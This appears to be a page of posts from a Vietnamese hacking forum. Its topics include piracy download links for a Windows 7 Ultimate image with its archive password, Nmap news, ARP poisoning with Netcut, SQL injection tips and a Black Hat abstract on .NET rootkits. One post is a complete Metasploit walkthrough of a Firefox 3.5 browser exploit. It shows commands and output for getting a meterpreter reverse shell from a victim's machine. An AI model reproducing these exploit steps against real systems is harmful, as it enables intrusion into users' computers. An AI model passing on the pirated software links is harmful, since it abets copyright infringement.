|
|
Giang sơn dể đổi, bản tính khó dời
|
|
|
Bác nào cần download thì download nhé, còn actived thì chịu khó google
Code:
http://oron.com/jidufyu2qbam/Gxc.OS.W7-Ultimate-x86_UDS.part23.rar.html
http://oron.com/eziuk8n6jiqi/Gxc.OS.W7-Ultimate-x86_UDS.part12.rar.html
http://oron.com/tb38y9xjfive/Gxc.OS.W7-Ultimate-x86_UDS.part24.rar.html
http://oron.com/ow1v7ksvusjt/Gxc.OS.W7-Ultimate-x86_UDS.part01.rar.html
http://oron.com/c5ymgv9jsxf4/Gxc.OS.W7-Ultimate-x86_UDS.part02.rar.html
http://oron.com/4qigdsuq62iq/Gxc.OS.W7-Ultimate-x86_UDS.part03.rar.html
http://oron.com/8fqihyp20o5v/Gxc.OS.W7-Ultimate-x86_UDS.part04.rar.html
http://oron.com/8qp65qy7vz5l/Gxc.OS.W7-Ultimate-x86_UDS.part05.rar.html
http://oron.com/2soi4zgphkxn/Gxc.OS.W7-Ultimate-x86_UDS.part06.rar.html
http://oron.com/frhdas3s7tbo/Gxc.OS.W7-Ultimate-x86_UDS.part07.rar.html
http://oron.com/lu5hz3msvvah/Gxc.OS.W7-Ultimate-x86_UDS.part08.rar.html
http://oron.com/usrbyzt52jqg/Gxc.OS.W7-Ultimate-x86_UDS.part09.rar.html
http://oron.com/4uf8flbe7y7o/Gxc.OS.W7-Ultimate-x86_UDS.part10.rar.html
http://oron.com/qr4xlj4bne55/Gxc.OS.W7-Ultimate-x86_UDS.part11.rar.html
http://oron.com/hml8h80lg1vr/Gxc.OS.W7-Ultimate-x86_UDS.part13.rar.html
http://oron.com/fy443ymyblar/Gxc.OS.W7-Ultimate-x86_UDS.part14.rar.html
http://oron.com/hznzy18vd2jo/Gxc.OS.W7-Ultimate-x86_UDS.part15.rar.html
http://oron.com/ivnaov18e1b0/Gxc.OS.W7-Ultimate-x86_UDS.part16.rar.html
http://oron.com/2rb14vv2jqp0/Gxc.OS.W7-Ultimate-x86_UDS.part17.rar.html
http://oron.com/c66yfi27w0yb/Gxc.OS.W7-Ultimate-x86_UDS.part18.rar.html
http://oron.com/kjzl2fohx0ix/Gxc.OS.W7-Ultimate-x86_UDS.part19.rar.html
http://oron.com/7o1tuw9otqo7/Gxc.OS.W7-Ultimate-x86_UDS.part20.rar.html
http://oron.com/7qs7m2ig0y8m/Gxc.OS.W7-Ultimate-x86_UDS.part21.rar.html
http://oron.com/fv0z2euvohct/Gxc.OS.W7-Ultimate-x86_UDS.part22.rar.html
http://oron.com/ofk6eufdev2j/Gxc.OS.en_windows_7_ultimate_x86_dvd_X15-65921_UDS.txt.html
Password unar : ut@updatesofts.com
Code:
http://ul.to/h7pqn7/Gxc.OS.W7-Ultimate-x86_UDS.part02.rar
http://ul.to/ax84tv/Gxc.OS.W7-Ultimate-x86_UDS.part01.rar
http://ul.to/5×4ibh/Gxc.OS.W7-Ultimate-x86_UDS.part03.rar
http://ul.to/fvyf1i/Gxc.OS.W7-Ultimate-x86_UDS.part04.rar
http://ul.to/tuga8b/Gxc.OS.W7-Ultimate-x86_UDS.part05.rar
http://ul.to/5xvm8s/Gxc.OS.W7-Ultimate-x86_UDS.part06.rar
http://ul.to/1dn5xr/Gxc.OS.W7-Ultimate-x86_UDS.part08.rar
http://ul.to/j5uvv7/Gxc.OS.W7-Ultimate-x86_UDS.part07.rar
http://ul.to/p0rzo6/Gxc.OS.W7-Ultimate-x86_UDS.part09.rar
http://ul.to/9t1ofl/Gxc.OS.W7-Ultimate-x86_UDS.part10.rar
http://ul.to/011ida/Gxc.OS.W7-Ultimate-x86_UDS.part11.rar
http://ul.to/2h4cbl/Gxc.OS.W7-Ultimate-x86_UDS.part12.rar
http://ul.to/nkkyrd/Gxc.OS.W7-Ultimate-x86_UDS.part13.rar
http://ul.to/931xle/Gxc.OS.W7-Ultimate-x86_UDS.part14.rar
http://ul.to/0eudr7/Gxc.OS.W7-Ultimate-x86_UDS.part15.rar
http://ul.to/ctqb5l/Gxc.OS.W7-Ultimate-x86_UDS.part16.rar
http://ul.to/hy5748/Gxc.OS.W7-Ultimate-x86_UDS.part17.rar
http://ul.to/51i0du/Gxc.OS.W7-Ultimate-x86_UDS.part18.rar
http://ul.to/ws0qqw/Gxc.OS.W7-Ultimate-x86_UDS.part19.rar
http://ul.to/1hwsr7/Gxc.OS.W7-Ultimate-x86_UDS.part20.rar
http://ul.to/zlvnop/Gxc.OS.W7-Ultimate-x86_UDS.part21.rar
http://ul.to/descsk/Gxc.OS.W7-Ultimate-x86_UDS.part22.rar
http://ul.to/3b79a0/Gxc.OS.W7-Ultimate-x86_UDS.part24.rar
http://ul.to/cdaa64/Gxc.OS.W7-Ultimate-x86_UDS.part23.rar
Password unar : ut@updatesofts.com
Link download có thể thay thế cho nhau
|
|
|
Nếu chưa biết cả Perl và Python, thì nên học Python đi
|
|
|
Insecure.Org is pleased to announce the immediate, free availability of the Nmap Security Scanner version 5.00 from nmap.org. This is the first stable release since 4.76 (last September), and the first major release since the 4.50 release in 2007, download : http://nmap.org/download.html
|
|
|
Netcut dùng ARP để đầu độc, giống như CAIN, còn link download thì google.com sẽ có tất cả cho bạn.
Cách Anti thì một là bạn chạy Netcut rồi chọn chức năng Protect my computer gì đó, hoặc là đặt static MAC Address cách chống giống như chống CAIN
|
|
|
Kaspersky vừa mới xử xong em này
Cách dùng 0-day này với metasploit (mình dùng reverse_tcp nha):
msf > use exploit/multi/browser/firefox_escape_retval
msf exploit(firefox_escape_retval) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(firefox_escape_retval) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Use SSL
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LHOST yes The local address
LPORT 4444 yes The local port
Exploit target:
Id Name
-- ----
0 Firefox 3.5.0 on Windows XP SP0-SP3
SRVPORT hiện là 8080, thay đổi lại thành 80 cho dễ dùng, và set url Path luôn nha :
msf exploit(firefox_escape_retval) > set SRVPORT 80
SRVPORT => 80
msf exploit(firefox_escape_retval) > set URIPATH index.html
URIPATH => index.html
Nhớ set lại IP để reverse về nhé :
msf exploit(firefox_escape_retval) > set LHOST 203.162.11.12
LHOST => 203.162.11.12
Lúc này server sẽ lắng nghe ở port 4444, nếu cần thì thay đổi lại cho phù hợp.
bắt đầu run exploit
msf exploit(firefox_escape_retval) > exploit
[*] Exploit running as background job.
msf exploit(firefox_escape_retval) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using url: http://0.0.0.0:80/index.html
[*] Local IP: http://203.162.11.12:80/index.html
[*] Server started.
Sau khi victim run address xong, ta có được shell rồi, tiếp theo interaction vào session để có shell
msf exploit(firefox_escape_retval) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ipconfig
.................. làm gì nữa thì tùy nha, tuy nhiên nếu firefox cash hoặc victim đóng lại thì mất shell, vì thế khi có shell rồi tranh thủ nhanh tay làm cái gì đó thì làm nha
|
|
|
Ai lại chơi chuyện "xúi" người ta hack web này web nọ vậy Sao bạn không tự mình làm đi , còn nếu nhờ ai đó thì nên private message đi
|
|
|
MySQL không support multi query, khi bạn order thì nó true, nhưng khi dùng UNION thì có lẽ là không được, với dạng multi query thì có lẽ dùng kỷ thuật blind là hợp lý. MySQLI thì lại có multi query
|
|
|
Bác nào cho mình hỏi tí, nếu chạy liên tục vài lần thì nhận được thông báo như sau, tràn bộ đệm interger là sao nhĩ ? Mặc dù vẫn lấy được user và password.
D:\www\exploit\wargame\level0.py:15: DeprecationWarning: struct integer overflow
masking is deprecated
sock.send(pack('<I',sum))
|
|
|
Mới vào blackhat xem thông tin, đề tài này cũng sẽ được trình bày vào tháng 4-2009.
Link : http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html
Erez Metula
.NET Framework Rootkits: Backdoors inside your Framework
This presentation introduces application level rootkit attacks on managed code environments, enabling an attacker to change the language runtime implementation, and to hide malicious code inside its core. This presentation focuses on the .NET Framework, while covering various ways to develop malware (rootkits,backdoors,logic manipulation, etc.) for the .NET framework, by changing its behavior. It includes demos of information logging, reverse shells, backdoors, encryption keys fixation, and other nasty things.
This presentation also introduces ".Net-Sploit" - a new tool for building MSIL malware that will enable the user to inject preloaded/custom payload to the Framework core DLL.
The Whitepaper, .NET-Sploit, and source code can be found here
Erez Metula is a senior application security consultant, working as the application security department manager at 2BSecure. He has extensive hands-on experience performing security assessments, secure development consulting & training for clients in Israel and abroad such as banks, financial organizations, military, software development companies, telecom, and more. Erez is also a leading instructor for many information security training, especially on secure software development methodologies & techniques. He had lectured on advanced .NET security (and other development platforms) for worldwide organizations and is constant speaker for conferences such as Microsoft .NET Security User Group, OWASP (Open Web Application Security Project), and more. He holds a CISSP certification and is toward graduation of Msc in computer science.
|
|
|
@meomeo_bebong: bạn có thể upload lên mediafire.com hoặc rapidshare.com, cái nào cũng được.
|
|
|
Cài cái BitTorrent vào là down thôi. Còn muốn download nhanh hơn thì cấu hình mở port cho modem, google một chút là ra hết.
|
|
|
Good ! Anh em có sách hay CD Live thì cứ đóng góp lên Topic, hy vọng thời gian sắp tới chúng ta làm đủ bộ hakin9.
|
|
|
|
|
|
|